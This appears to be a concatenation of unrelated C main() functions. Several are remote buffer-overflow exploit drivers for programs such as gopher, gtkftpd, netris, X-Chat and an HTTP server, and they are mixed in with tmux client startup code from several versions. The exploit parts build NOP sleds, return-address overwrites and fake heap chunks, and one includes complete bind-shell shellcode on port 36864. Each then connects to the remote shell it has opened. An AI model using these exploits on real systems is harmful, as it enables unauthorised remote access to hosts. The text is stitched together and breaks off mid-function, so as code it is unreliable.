/* begin. */
int main(int argc,char **argv){
unsigned short port=0,sport=DFL_BINDSHELL_PORT;
char *hostptr;
printf("[*] gopher[v3.0.9+]: remote (client) buffer overflow exp"
"loit.\n[*] by: vade79/v9 [email protected] (fakehalo/realhalo)\n\n");
if(argc<2){
printf("[!] syntax: %s <port> [bindshell port]\n",argv[0]);
exit(1);
}
port=atoi(argv[1]);
if(argc>2)sport=atoi(argv[2]);
/* set the port to bind to in the shellcode. */
x86_exec[20]=(sport&0xff00)>>8;
x86_exec[21]=(sport&0x00ff);
/* verbose values display. */
printf("[*] replacement \"vi\" address\t\t: 0x%.8x\n",REPLACE_VI_ADDR);
printf("[*] return address\t\t\t: 0x%.8x\n",RET_ADDR);
printf("[*] offset from the end of tmpstr[]\t: %d (=%d)\n",
PLACEMENT_OFFSET,PLACEMENT_OFFSET*4);
printf("[*] server port\t\t\t\t: %u\n",port);
printf("[*] bindshell port\t\t\t: %u\n\n",sport);
/* wait for a connection and send overflow. */
hostptr=gopherd_bind(port);
/* be safe, and give it time to run. */
sleep(3);
/* see if a shell spawned. */
getshell(hostptr,sport);
exit(0);
}
void ftp_parse(int sock){
unsigned int offset=0;
ftp_read(sock); /* get the banner. */
ftp_printf(sock,"USER %s\r\n",user);
ftp_read(sock);
ftp_printf(sock,"PASS %s\r\n",pass);
ftp_read(sock);
ftp_printf(sock,"CWD %s\r\n",writedir);
ftp_read(sock);
basedir=getbdir(); /* tmp dir of our own to use. */
ftp_printf(sock,"MKD %s\r\n",basedir);
ftp_read(sock);
ftp_printf(sock,"CWD %s\r\n",basedir);
ftp_read(sock);
while(offset<(attempts*400)){ /* if it hasn't yet, it's not going to. */
/* slight null-byte/CR check, only needs to check the last byte. */
if((!reverse&&!((baseaddr-offset)&0xff))||(reverse&&!((baseaddr+offset)
&0xff))||(!reverse&&((baseaddr-offset)&0xff)=='\n')||(reverse&&
((baseaddr+offset)&0xff)=='\n')){
printf("[!] brute address contains null-byte/CR, increasing offset "
"by one byte.\n");
offset++; /* one byte off if reversed won't hurt here. (401) */
}
/* make the evil oversized directory. (255 or less bytes) */
ftp_printf(sock,"MKD %s\r\n",getdir(offset));
ftp_read(sock);
/* date+directory exceeds 256 byte buffer, the exploit. */
sleep(1); /* delay insurance. */
ftp_printf(sock,"LIST -%s\r\n",getcode());
/* nothing to read here, and gtkftpd processes (the exploit) */
/* before the ftp list connection is made, making it */
/* pointless to view the list. */
sleep(1); /* delay insurance, again, just to be sure. */
/* delete directory, multiples will cause failure(s). */
ftp_printf(sock,"RMD %s\r\n",getdir(offset));
ftp_read(sock);
getshell(sock,offset);
offset+=400; /* always at least 400 nops in a row, in shellcode. */
}
ftp_clean(sock);
close(sock);
return;
}
int main(int argc,char **argv){
unsigned short isbind=0,nport=DFLPORT; /* default. */
char *hostptr;
printf("[*] netris[v0.5-]: client/server remote buffer overflow ex"
"ploit.\n[*] by: vade79/v9 [email protected] (fakehalo)\n\n");
if(argc<2){
printf("[!] syntax: %s <host|-b> [port]\n",argv[0]);
exit(1);
}
if(!strcmp(argv[1],"-b"))
isbind=1;
if(argc>2)
nport=atoi(argv[2]);
if(isbind)
hostptr=netris_bind(nport);
else
netris_connect((hostptr=argv[1]),nport);
sleep(1);
getshell(hostptr,45295); /* defined in shellcode. */
exit(0);
}
int main(int argc,char **argv){
unsigned short port=DFLPORT,sport=DFLSPRT;
unsigned int retaddr=BSEADDR;
char *hostptr;
if(BUFSIZE<0||BUFSIZE>255)printe("BUFSIZE must be 1-255(char/int8).",1);
printf("[*] X-Chat[v1.8.0-v2.0.8]: socks-5 remote buffer overflow exp"
"loit.\n[*] by: by: vade79/v9 v9 fakehalo deadpig org (fakehalo)\n\n");
if(argc<2){
printf("[!] syntax: %s <offset from 0x%.8x> [port] [shell port]\n\n",
argv[0],BSEADDR);
exit(1);
}
if(argc>1)retaddr-=atoi(argv[1]);
if(argc>2)port=atoi(argv[2]);
if(argc>3)sport=atoi(argv[3]);
x86_exec[20]=(sport&0xff00)>>8;
x86_exec[21]=(sport&0x00ff);
printf("[*] eip: 0x%.8x, socks-5 port: %u, bindshell port: %u.\n",
retaddr,port,sport);
hostptr=socks5_bind(port,retaddr);
sleep(1);
getshell(hostptr,sport);
exit(0);
}
int
main(int argc, char **argv)
{
struct passwd *pw;
char *s, *path, *label, *home, **var;
int opt, flags, quiet, keys;
#if defined(DEBUG) && defined(__OpenBSD__)
malloc_options = (char *) "AFGJPX";
#endif
flags = IDENTIFY_256COLOURS | IDENTIFY_UTF8;
quiet = 0;
label = path = NULL;
login_shell = (**argv == '-');
while ((opt = getopt(argc, argv, "28c:Cdf:lL:qS:uUvV")) != -1) {
switch (opt) {
case '2':
flags |= IDENTIFY_256COLOURS;
flags &= ~IDENTIFY_88COLOURS;
break;
case '8':
flags |= IDENTIFY_88COLOURS;
flags &= ~IDENTIFY_256COLOURS;
break;
case 'c':
free(shell_cmd);
shell_cmd = xstrdup(optarg);
break;
case 'C':
if (flags & IDENTIFY_CONTROL)
flags |= IDENTIFY_TERMIOS;
else
flags |= IDENTIFY_CONTROL;
break;
case 'V':
printf("%s %s\n", __progname, VERSION);
exit(0);
case 'f':
free(cfg_file);
cfg_file = xstrdup(optarg);
break;
case 'l':
login_shell = 1;
break;
case 'L':
free(label);
label = xstrdup(optarg);
break;
case 'q':
quiet = 1;
break;
case 'S':
free(path);
path = xstrdup(optarg);
break;
case 'u':
flags |= IDENTIFY_UTF8;
break;
case 'v':
debug_level++;
break;
default:
usage();
}
}
argc -= optind;
argv += optind;
if (shell_cmd != NULL && argc != 0)
usage();
if (!(flags & IDENTIFY_UTF8)) {
/*
* If the user has set whichever of LC_ALL, LC_CTYPE or LANG
* exist (in that order) to contain UTF-8, it is a safe
* assumption that either they are using a UTF-8 terminal, or
* if not they know that output from UTF-8-capable programs may
* be wrong.
*/
if ((s = getenv("LC_ALL")) == NULL || *s == '\0') {
if ((s = getenv("LC_CTYPE")) == NULL || *s == '\0')
s = getenv("LANG");
}
if (s != NULL && (strcasestr(s, "UTF-8") != NULL ||
strcasestr(s, "UTF8") != NULL))
flags |= IDENTIFY_UTF8;
}
environ_init(&global_environ);
for (var = environ; *var != NULL; var++)
environ_put(&global_environ, *var);
options_init(&global_options, NULL);
options_table_populate_tree(server_options_table, &global_options);
options_set_number(&global_options, "quiet", quiet);
options_init(&global_s_options, NULL);
options_table_populate_tree(session_options_table, &global_s_options);
options_set_string(&global_s_options, "default-shell", "%s", getshell());
options_init(&global_w_options, NULL);
options_table_populate_tree(window_options_table, &global_w_options);
/* Enable UTF-8 if the first client is on UTF-8 terminal. */
if (flags & IDENTIFY_UTF8) {
options_set_number(&global_s_options, "status-utf8", 1);
options_set_number(&global_s_options, "mouse-utf8", 1);
options_set_number(&global_w_options, "utf8", 1);
}
/* Override keys to vi if VISUAL or EDITOR are set. */
if ((s = getenv("VISUAL")) != NULL || (s = getenv("EDITOR")) != NULL) {
if (strrchr(s, '/') != NULL)
s = strrchr(s, '/') + 1;
if (strstr(s, "vi") != NULL)
keys = MODEKEY_VI;
else
keys = MODEKEY_EMACS;
options_set_number(&global_s_options, "status-keys", keys);
options_set_number(&global_w_options, "mode-keys", keys);
}
/* Locate the configuration file. */
if (cfg_file == NULL) {
home = getenv("HOME");
if (home == NULL || *home == '\0') {
pw = getpwuid(getuid());
if (pw != NULL)
home = pw->pw_dir;
}
xasprintf(&cfg_file, "%s/%s", home, DEFAULT_CFG);
if (access(cfg_file, R_OK) != 0 && errno == ENOENT) {
free(cfg_file);
cfg_file = NULL;
}
}
/*
* Figure out the socket path. If specified on the command-line with -S
* or -L, use it, otherwise try $TMUX or assume -L default.
*/
parseenvironment();
if (path == NULL) {
/* If no -L, use the environment. */
if (label == NULL) {
if (environ_path != NULL)
path = xstrdup(environ_path);
}
/* -L or default set. */
if (!path) {
if ((path = makesocketpath(label)) == NULL) {
fprintf(stderr, "can't create socket\n");
exit(1);
}
}
}
free(label);
strlcpy(socket_path, path, sizeof socket_path);
free(path);
#ifdef HAVE_SETPROCTITLE
/* Set process title. */
setproctitle("%s (%s)", __progname, socket_path);
#endif
/* Pass control to the client. */
ev_base = osdep_event_init();
exit(client_main(argc, argv, flags));
}
int
main(int argc, char **argv)
{
char *path, *label, **var, tmp[PATH_MAX], *shellcmd = NULL;
const char *s;
int opt, flags, keys;
#if defined(DEBUG) && defined(__OpenBSD__)
malloc_options = (char *) "AFGJPX";
#endif
setlocale(LC_TIME, "");
tzset();
if (**argv == '-')
flags = CLIENT_LOGIN;
else
flags = 0;
#ifdef TMATE
tmate_catch_sigsegv();
flags |= CLIENT_256COLOURS | CLIENT_UTF8;
#endif
label = path = NULL;
while ((opt = getopt(argc, argv, "2c:Cdf:lL:qS:uUVv")) != -1) {
switch (opt) {
case '2':
flags |= CLIENT_256COLOURS;
break;
case 'c':
free(shellcmd);
shellcmd = xstrdup(optarg);
break;
case 'C':
if (flags & CLIENT_CONTROL)
flags |= CLIENT_CONTROLCONTROL;
else
flags |= CLIENT_CONTROL;
break;
case 'V':
printf("%s %s\n", __progname, VERSION);
exit(0);
case 'f':
set_cfg_file(optarg);
break;
case 'l':
flags |= CLIENT_LOGIN;
break;
case 'L':
free(label);
label = xstrdup(optarg);
break;
case 'q':
break;
case 'S':
free(path);
path = xstrdup(optarg);
break;
case 'u':
flags |= CLIENT_UTF8;
break;
case 'v':
log_add_level();
break;
default:
usage();
}
}
argc -= optind;
argv += optind;
if (shellcmd != NULL && argc != 0)
usage();
#ifdef __OpenBSD__
if (pledge("stdio rpath wpath cpath flock fattr unix getpw sendfd "
"recvfd proc exec tty ps", NULL) != 0)
err(1, "pledge");
#endif
/*
* tmux is a UTF-8 terminal, so if TMUX is set, assume UTF-8.
* Otherwise, if the user has set LC_ALL, LC_CTYPE or LANG to contain
* UTF-8, it is a safe assumption that either they are using a UTF-8
* terminal, or if not they know that output from UTF-8-capable
* programs may be wrong.
*/
if (getenv("TMUX") != NULL)
flags |= CLIENT_UTF8;
else {
s = getenv("LC_ALL");
if (s == NULL || *s == '\0')
s = getenv("LC_CTYPE");
if (s == NULL || *s == '\0')
s = getenv("LANG");
if (s == NULL || *s == '\0')
s = "";
if (strcasestr(s, "UTF-8") != NULL ||
strcasestr(s, "UTF8") != NULL)
flags |= CLIENT_UTF8;
}
global_hooks = hooks_create(NULL);
global_environ = environ_create();
for (var = environ; *var != NULL; var++)
environ_put(global_environ, *var);
if (getcwd(tmp, sizeof tmp) != NULL)
environ_set(global_environ, "PWD", "%s", tmp);
global_options = options_create(NULL);
options_table_populate_tree(OPTIONS_TABLE_SERVER, global_options);
global_s_options = options_create(NULL);
options_table_populate_tree(OPTIONS_TABLE_SESSION, global_s_options);
options_set_string(global_s_options, "default-shell", "%s", getshell());
global_w_options = options_create(NULL);
options_table_populate_tree(OPTIONS_TABLE_WINDOW, global_w_options);
/* Override keys to vi if VISUAL or EDITOR are set. */
if ((s = getenv("VISUAL")) != NULL || (s = getenv("EDITOR")) != NULL) {
if (strrchr(s, '/') != NULL)
s = strrchr(s, '/') + 1;
if (strstr(s, "vi") != NULL)
keys = MODEKEY_VI;
else
keys = MODEKEY_EMACS;
options_set_number(global_s_options, "status-keys", keys);
options_set_number(global_w_options, "mode-keys", keys);
}
/*
* If socket is specified on the command-line with -S or -L, it is
* used. Otherwise, $TMUX is checked and if that fails "default" is
* used.
*/
if (path == NULL && label == NULL) {
s = getenv("TMUX");
if (s != NULL && *s != '\0' && *s != ',') {
path = xstrdup(s);
path[strcspn (path, ",")] = '\0';
}
}
if (path == NULL && (path = make_label(label)) == NULL) {
fprintf(stderr, "can't create socket: %s\n", strerror(errno));
exit(1);
}
socket_path = path;
free(label);
/* Pass control to the client. */
exit(client_main(event_init(), argc, argv, flags, shellcmd));
}
int main( int argc, char **argv)
{
/* first 2 bytes are a type 74 request */
/* last two bytes length */
char head[] = "\x00\x4a\x00\x03\x00\x01\xff\xff";
char data[512];
char sc_req[20000];
char *host;
unsigned int tnum;
unsigned int safeaddr;
unsigned int ret;
int datalen = LEN;
int port = ARK_PORT;
unsigned int addr = 0;
int sock_overflow, sock_nops, sock_shell;
int i;
if (argc == 3)
{
host = argv[1];
tnum = atoi(argv[2]);
if (tnum > NUMTARGS || tnum == 0)
{
fprintf(stderr, "[!] Invalid target\n");
usage(argv[0]);
}
}
else
{
usage(argv[0]);
}
tnum--;
ret = targets[tnum].targret;
safeaddr = targets[tnum].targsafe;
sock_overflow = sock_nops = sock_shell = 0;
sock_nops = isock(host, port);
sock_overflow = isock(host, port);
// build data section of overflow packet
memset(data, 0x90, datalen);
for (i = 0; i < datalen; i += 4)
memcpy(data+i, (char *)&ret, 4);
// we overwrite a pointer that must be a valid address
memcpy(data+datalen-12, (char *)&safeaddr, 4);
// build header of overflow packet
datalen = ntohs(datalen);
memcpy(head+6, (char *)&datalen, 2);
// build invalid packet with nops+shellcode
memset(sc_req, 0x90, NOP_LEN+1);
memcpy(sc_req+NOP_LEN, shellcode, sizeof(shellcode));
// send invalid nop+shellcode packet
fprintf(stderr, "[*] Sending nops+shellcode\n");
write(sock_nops, sc_req, NOP_LEN+sizeof(shellcode));
fprintf(stderr, "[*] Done, sleeping\n");
sleep(1);
close(sock_nops);
// send overflow
fprintf(stderr, "[*] Sending overflow\n");
write(sock_overflow, head, HEAD_LEN);
write(sock_overflow, data, LEN);
fprintf(stderr, "[*] Done\n");
fprintf(stderr, "[*] Sleeping and connecting remote shell\n");
sleep (1);
close(sock_overflow);
// connect to shell
sock_shell = isock(host, SHELL_PORT);
fprintf(stderr, "[*] Success, enjoy\n");
getshell(sock_shell);
}
int
main(int argc, char **argv)
{
char *s, *path, *label, **var, tmp[PATH_MAX];
int opt, flags, keys;
#if defined(DEBUG) && defined(__OpenBSD__)
malloc_options = (char *) "AFGJPX";
#endif
setlocale(LC_TIME, "");
if (**argv == '-')
flags = CLIENT_LOGIN;
else
flags = 0;
label = path = NULL;
while ((opt = getopt(argc, argv, "2c:Cdf:lL:qS:uUVv")) != -1) {
switch (opt) {
case '2':
flags |= CLIENT_256COLOURS;
break;
case 'c':
free(shell_cmd);
shell_cmd = xstrdup(optarg);
break;
case 'C':
if (flags & CLIENT_CONTROL)
flags |= CLIENT_CONTROLCONTROL;
else
flags |= CLIENT_CONTROL;
break;
case 'V':
printf("%s %s\n", __progname, VERSION);
exit(0);
case 'f':
set_cfg_file(optarg);
break;
case 'l':
flags |= CLIENT_LOGIN;
break;
case 'L':
free(label);
label = xstrdup(optarg);
break;
case 'q':
break;
case 'S':
free(path);
path = xstrdup(optarg);
break;
case 'u':
flags |= CLIENT_UTF8;
break;
case 'v':
debug_level++;
break;
default:
usage();
}
}
argc -= optind;
argv += optind;
if (shell_cmd != NULL && argc != 0)
usage();
if (!(flags & CLIENT_UTF8)) {
/*
* If the user has set whichever of LC_ALL, LC_CTYPE or LANG
* exist (in that order) to contain UTF-8, it is a safe
* assumption that either they are using a UTF-8 terminal, or
* if not they know that output from UTF-8-capable programs may
* be wrong.
*/
if ((s = getenv("LC_ALL")) == NULL || *s == '\0') {
if ((s = getenv("LC_CTYPE")) == NULL || *s == '\0')
s = getenv("LANG");
}
if (s != NULL && (strcasestr(s, "UTF-8") != NULL ||
strcasestr(s, "UTF8") != NULL))
flags |= CLIENT_UTF8;
}
environ_init(&global_environ);
for (var = environ; *var != NULL; var++)
environ_put(&global_environ, *var);
if (getcwd(tmp, sizeof tmp) != NULL)
environ_set(&global_environ, "PWD", tmp);
options_init(&global_options, NULL);
options_table_populate_tree(server_options_table, &global_options);
options_init(&global_s_options, NULL);
options_table_populate_tree(session_options_table, &global_s_options);
options_set_string(&global_s_options, "default-shell", "%s",
getshell());
options_init(&global_w_options, NULL);
options_table_populate_tree(window_options_table, &global_w_options);
/* Enable UTF-8 if the first client is on UTF-8 terminal. */
if (flags & CLIENT_UTF8) {
options_set_number(&global_s_options, "status-utf8", 1);
options_set_number(&global_s_options, "mouse-utf8", 1);
options_set_number(&global_w_options, "utf8", 1);
}
/* Override keys to vi if VISUAL or EDITOR are set. */
if ((s = getenv("VISUAL")) != NULL || (s = getenv("EDITOR")) != NULL) {
if (strrchr(s, '/') != NULL)
s = strrchr(s, '/') + 1;
if (strstr(s, "vi") != NULL)
keys = MODEKEY_VI;
else
keys = MODEKEY_EMACS;
options_set_number(&global_s_options, "status-keys", keys);
options_set_number(&global_w_options, "mode-keys", keys);
}
/*
* Figure out the socket path. If specified on the command-line with -S
* or -L, use it, otherwise try $TMUX or assume -L default.
*/
if (path == NULL) {
/* If no -L, use the environment. */
if (label == NULL) {
s = getenv("TMUX");
if (s != NULL) {
path = xstrdup(s);
path[strcspn (path, ",")] = '\0';
if (*path == '\0') {
free(path);
label = xstrdup("default");
}
} else
label = xstrdup("default");
}
/* -L or default set. */
if (label != NULL) {
if ((path = makesocketpath(label)) == NULL) {
fprintf(stderr, "can't create socket: %s\n",
strerror(errno));
exit(1);
}
}
}
free(label);
if (strlcpy(socket_path, path, sizeof socket_path) >=
sizeof socket_path) {
fprintf(stderr, "socket path too long: %s\n", path);
exit(1);
}
free(path);
#ifdef HAVE_SETPROCTITLE
/* Set process title. */
setproctitle("%s (%s)", __progname, socket_path);
#endif
/* Pass control to the client. */
exit(client_main(event_init(), argc, argv, flags));
}
int main(int argc,char *argv[])
{
int port=D_PORT;
char hostname[0x333]=D_HOST;
int whlp,type=0;
unsigned int i=0;
char buf[BUFSIZE+1];
char buf2[BUFSIZE2+1];
char sendbuf[BUFSIZE3+1];
int sd;
u_long retaddr=__pl_form[type].retaddr;
(void)banrl();
while((whlp=getopt(argc,argv,"T:t:H:h:P:p:IiXx"))!=EOF)
{
extern char *optarg;
switch(whlp)
{
case 'T':
case 't':
if((type=atoi(optarg))<6)
{
retaddr=__pl_form[type].retaddr;
}
else (void)x_fp_rm_usage(argv[0]);
break;
case 'H':
case 'h':
memset((char *)hostname,0,sizeof(hostname));
strncpy(hostname,optarg,sizeof(hostname)-1);
break;
case 'P':
case 'p':
port=atoi(optarg);
break;
case 'I':
case 'i':
fprintf(stderr," Try `%s -?' for more information.\n\n",argv[0]);
exit(-1);
case '?':
(void)x_fp_rm_usage(argv[0]);
break;
}
}
if(!strcmp(hostname,D_HOST))
{
(void)x_fp_rm_usage(argv[0]);
}
{
fprintf(stdout," [+] Hostname: %s\n",hostname);
fprintf(stdout," [+] Port num: %d\n",port);
fprintf(stdout," [+] Retaddr address: %p\n",retaddr);
}
fprintf(stdout," [1] #1 Set codes.\n");
memset(buf, 0x90, BUFSIZE);
memcpy(&buf[BUFSIZE-(sizeof(retaddr))], &retaddr, sizeof(retaddr));
memset(buf2,0x90,88);
memcpy(buf2+88,shell, sizeof(shell));
snprintf(sendbuf,1024,"GET %s /HTTP/1.0\r\nUser-Agent:
%s\r\n\r\n",buf,buf2);
fprintf(stdout," [1] #1 Set socket.\n");
sd=sock_connect(hostname,port);
fprintf(stdout," [1] #1 Send codes.\n");
write(sd,sendbuf,BUFSIZE3);
close(sd);
sleep(1);
fprintf(stdout," [1] #3 Get shell.\n");
getshell(hostname,26112);
exit(0);
}
int main(int argc,char *argv[])
{
int at_sock;
int ts_sock;
int port=PORT;
int roup;
char ttatk_code[36864];
char hostname[0x82]=HOST;
char main_str[] = /* BIND SHELL ON PORT TCP/36864 */
//------------------- main: -------------------//
"\xeb\x72" /* jmp callz */
//------------------- start: ------------------//
"\x5e" /* popl %esi */
//------------------ socket() -----------------//
"\x29\xc0" /* subl %eax, %eax */
"\x89\x46\x10" /* movl %eax, 0x10(%esi) */
"\x40" /* incl %eax */
"\x89\xc3" /* movl %eax, %ebx */
"\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */
"\x40" /* incl %eax */
"\x89\x46\x08" /* movl %eax, 0x08(%esi) */
"\x8d\x4e\x08" /* leal 0x08(%esi), %ecx */
"\xb0\x66" /* movb $0x66, %al */
"\xcd\x80" /* int $0x80 */
//------------------- bind() ------------------//
"\x43" /* incl %ebx */
"\xc6\x46\x10\x10" /* movb $0x10, 0x10(%esi) */
"\x66\x89\x5e\x14" /* movw %bx, 0x14(%esi) */
"\x88\x46\x08" /* movb %al, 0x08(%esi) */
"\x29\xc0" /* subl %eax, %eax */
"\x89\xc2" /* movl %eax, %edx */
"\x89\x46\x18" /* movl %eax, 0x18(%esi) */
"\xb0\x90" /* movb $0x90, %al */
"\x66\x89\x46\x16" /* movw %ax, 0x16(%esi) */
"\x8d\x4e\x14" /* leal 0x14(%esi), %ecx */
"\x89\x4e\x0c" /* movl %ecx, 0x0c(%esi) */
"\x8d\x4e\x08" /* leal 0x08(%esi), %ecx */
"\xb0\x66" /* movb $0x66, %al */
"\xcd\x80" /* int $0x80 */
//------------------ listen() -----------------//
"\x89\x5e\x0c" /* movl %ebx, 0x0c(%esi) */
"\x43" /* incl %ebx */
"\x43" /* incl %ebx */
"\xb0\x66" /* movb $0x66, %al */
"\xcd\x80" /* int $0x80 */
//------------------ accept() -----------------//
"\x89\x56\x0c" /* movl %edx, 0x0c(%esi) */
"\x89\x56\x10" /* movl %edx, 0x10(%esi) */
"\xb0\x66" /* movb $0x66, %al */
"\x43" /* incl %ebx */
"\xcd\x80" /* int $0x80 */
//---- dup2(s, 0), dup2(s, 1), dup2(s, 2) -----//
"\x86\xc3" /* xchgb %al, %bl */
"\xb0\x3f" /* movb $0x3f, %al */
"\x29\xc9" /* subl %ecx, %ecx */
"\xcd\x80" /* int $0x80 */
"\xb0\x3f" /* movb $0x3f, %al */
"\x41" /* incl %ecx */
"\xcd\x80" /* int $0x80 */
"\xb0\x3f" /* movb $0x3f, %al */
"\x41" /* incl %ecx */
"\xcd\x80" /* int $0x80 */
//------------------ execve() -----------------//
"\x88\x56\x07" /* movb %dl, 0x07(%esi) */
"\x89\x76\x0c" /* movl %esi, 0x0c(%esi) */
"\x87\xf3" /* xchgl %esi, %ebx */
"\x8d\x4b\x0c" /* leal 0x0c(%ebx), %ecx */
"\xb0\x0b" /* movb $0x0b, %al */
"\xcd\x80" /* int $0x80 */
//------------------- callz: ------------------//
"\xe8\x89\xff\xff\xff" /* call start */
"/bin/sh"; /* 128byte */
#define plus_4str(x0x) x0x+=4
int x0x_num=0;
int x0x_size=0;
#define BUF_LEN 1024
char *debug_test;
char code_128len[BUF_LEN];
char x82_16x0x[]={ /* 16byte */
0x82,0x82,0x82,0x82,0x82,
0x82,0x82,0x82,0x82,0x82,
0x82,0x82,0x82,0x82,0x82,
0x82
};
char nop_n_jump[4]={0x41,0xeb,0x0c,0x42};
int nop_12jump=0;
int ok_cont=0;
int target_type_number=0;
char p_rev_size[4]={0xff,0xff,0xff,0xfc}; /* chunk size */
char size_fd[4]={0xff,0xff,0xff,0xff}; /* data section size */
char atk_chunk[BUF_LEN];
unsigned long retloc=pl_form[target_type_number].retloc;
unsigned long retaddr=pl_form[target_type_number].retaddr;//.stkaddr;
memset(ttatk_code,0x00,36864);
memset(atk_chunk,0x00,BUF_LEN);
memset(code_128len,0x00,BUF_LEN);
(void)banrl(argv[0]);
while((roup=getopt(argc,argv,"R:r:S:s:H:h:P:p:"))!=EOF)
{
switch(roup)
{
case 'R':
case 'r':
retloc=strtoul(optarg,NULL,0);
break;
case 'S':
case 's':
retaddr=strtoul(optarg,NULL,0);
break;
case 'H':
case 'h':
memset(hostname,0x00,0x82);
strncpy(hostname,optarg,0x82);
break;
case 'P':
case 'p':
port=atoi(optarg);
break;
case '?':
(void)usage(argv[0]);
break;
}
}
//--- make fake chunk ---//
fprintf(stdout," [1] Make fake chunk.\n");
for(x0x_num=0;x0x_num<strlen(x82_16x0x);x0x_num++)
atk_chunk[x0x_num]=x82_16x0x[x0x_num];
*(long*)&atk_chunk[x0x_num]=0xfffffffc; // prev_size
plus_4str(x0x_num);
*(long*)&atk_chunk[x0x_num]=0xffffffff; // size(P)
plus_4str(x0x_num);
*(long*)&atk_chunk[x0x_num]=retloc-0x0c; // Forward pointer
plus_4str(x0x_num);
*(long*)&atk_chunk[x0x_num]=retaddr; // Back pointer
plus_4str(x0x_num);
//--- make code ---//
fprintf(stdout," [2] Make shellcode.\n");
for(nop_12jump=0;nop_12jump<0x190;plus_4str(nop_12jump))
*(long*)&code_128len[nop_12jump]=0x41eb0c42;
for(x0x_num=0,ok_cont=nop_12jump;x0x_num<strlen(main_str);x0x_num++)
code_128len[ok_cont++]=main_str[x0x_num];
//--- fake chunk + 0x20 + (nop + 12byte jmpcode + nop + shellcode) ---//
snprintf(ttatk_code,36864,
"%s%s%s\r\n",atk_chunk,"\x20",code_128len);
fprintf(stdout," [3] Send exploit (bindshell) code.\n");
{ // Try two times connections. It's Point. :-)
/* 1 */
at_sock=setsock(hostname,port);
re_conenter(at_sock);
send(at_sock,ttatk_code,strlen(ttatk_code),0);
close(at_sock);
/* 2 */
at_sock=setsock(hostname,port);
re_conenter(at_sock);
send(at_sock,ttatk_code,strlen(ttatk_code),0);
}
fprintf(stdout," [4] Waiting, executes the shell !\n");
sleep(3);
fprintf(stdout," [5] Trying %s:36864 ...\n",hostname);
/* 3 */
ts_sock=setsock(hostname,36864);
re_conenter(ts_sock);
fprintf(stdout," [6] Connected to %s:36864 !\n\n",hostname);
// Execute bash shell
getshell(ts_sock);
}
int
main(int argc, char **argv)
{
char *path, *label, tmp[PATH_MAX];
char *shellcmd = NULL, **var;
const char *s, *shell;
int opt, flags, keys;
const struct options_table_entry *oe;
if (setlocale(LC_CTYPE, "en_US.UTF-8") == NULL) {
if (setlocale(LC_CTYPE, "") == NULL)
errx(1, "invalid LC_ALL, LC_CTYPE or LANG");
s = nl_langinfo(CODESET);
if (strcasecmp(s, "UTF-8") != 0 && strcasecmp(s, "UTF8") != 0)
errx(1, "need UTF-8 locale (LC_CTYPE) but have %s", s);
}
setlocale(LC_TIME, "");
tzset();
if (**argv == '-')
flags = CLIENT_LOGIN;
else
flags = 0;
label = path = NULL;
while ((opt = getopt(argc, argv, "2c:Cdf:lL:qS:uUVv")) != -1) {
switch (opt) {
case '2':
flags |= CLIENT_256COLOURS;
break;
case 'c':
free(shellcmd);
shellcmd = xstrdup(optarg);
break;
case 'C':
if (flags & CLIENT_CONTROL)
flags |= CLIENT_CONTROLCONTROL;
else
flags |= CLIENT_CONTROL;
break;
case 'V':
printf("%s %s\n", getprogname(), VERSION);
exit(0);
case 'f':
set_cfg_file(optarg);
break;
case 'l':
flags |= CLIENT_LOGIN;
break;
case 'L':
free(label);
label = xstrdup(optarg);
break;
case 'q':
break;
case 'S':
free(path);
path = xstrdup(optarg);
break;
case 'u':
flags |= CLIENT_UTF8;
break;
case 'v':
log_add_level();
break;
default:
usage();
}
}
argc -= optind;
argv += optind;
if (shellcmd != NULL && argc != 0)
usage();
if ((ptm_fd = getptmfd()) == -1)
err(1, "getptmfd");
if (pledge("stdio rpath wpath cpath flock fattr unix getpw sendfd "
"recvfd proc exec tty ps", NULL) != 0)
err(1, "pledge");
/*
* tmux is a UTF-8 terminal, so if TMUX is set, assume UTF-8.
* Otherwise, if the user has set LC_ALL, LC_CTYPE or LANG to contain
* UTF-8, it is a safe assumption that either they are using a UTF-8
* terminal, or if not they know that output from UTF-8-capable
* programs may be wrong.
*/
if (getenv("TMUX") != NULL)
flags |= CLIENT_UTF8;
else {
s = getenv("LC_ALL");
if (s == NULL || *s == '\0')
s = getenv("LC_CTYPE");
if (s == NULL || *s == '\0')
s = getenv("LANG");
if (s == NULL || *s == '\0')
s = "";
if (strcasestr(s, "UTF-8") != NULL ||
strcasestr(s, "UTF8") != NULL)
flags |= CLIENT_UTF8;
}
global_hooks = hooks_create(NULL);
global_environ = environ_create();
for (var = environ; *var != NULL; var++)
environ_put(global_environ, *var);
if (getcwd(tmp, sizeof tmp) != NULL)
environ_set(global_environ, "PWD", "%s", tmp);
global_options = options_create(NULL);
global_s_options = options_create(NULL);
global_w_options = options_create(NULL);
for (oe = options_table; oe->name != NULL; oe++) {
if (oe->scope == OPTIONS_TABLE_SERVER)
options_default(global_options, oe);
if (oe->scope == OPTIONS_TABLE_SESSION)
options_default(global_s_options, oe);
if (oe->scope == OPTIONS_TABLE_WINDOW)
options_default(global_w_options, oe);
}
/*
* The default shell comes from SHELL or from the user's passwd entry
* if available.
*/
shell = getshell();
options_set_string(global_s_options, "default-shell", 0, "%s", shell);
/* Override keys to vi if VISUAL or EDITOR are set. */
if ((s = getenv("VISUAL")) != NULL || (s = getenv("EDITOR")) != NULL) {
if (strrchr(s, '/') != NULL)
s = strrchr(s, '/') + 1;
if (strstr(s, "vi") != NULL)
keys = MODEKEY_VI;
else
keys = MODEKEY_EMACS;
options_set_number(global_s_options, "status-keys", keys);
options_set_number(global_w_options, "mode-keys", keys);
}
/*
* If socket is specified on the command-line with -S or -L, it is
* used. Otherwise, $TMUX is checked and if that fails "default" is
* used.
*/
if (path == NULL && label == NULL) {
s = getenv("TMUX");
if (s != NULL && *s != '\0' && *s != ',') {
path = xstrdup(s);
path[strcspn(path, ",")] = '\0';
}
}
if (path == NULL && (path = make_label(label)) == NULL) {
fprintf(stderr, "can't create socket: %s\n", strerror(errno));
exit(1);
}
socket_path = path;
free(label);
/* Pass control to the client. */
exit(client_main(osdep_event_init(), argc, argv, flags, shellcmd));
}
int main(int argc,char *argv[])
{
int port=D_PORT;
char hostname[0x333]=D_HOST;
int whlp,type=0;
unsigned int i=0;
char buf[141];
char buf2[2078];
char sendbuf[3150];
char buf3[141];
int sd;
int ftpsd;
u_long retaddr=__pl_form[type].retaddr;
(void)banrl();
while((whlp=getopt(argc,argv,"T:t:H:h:u:c:a:P:p:IiXx"))!=EOF)
{
extern char *optarg;
switch(whlp)
{
case 'T':
case 't':
if((type=atoi(optarg))<6)
{
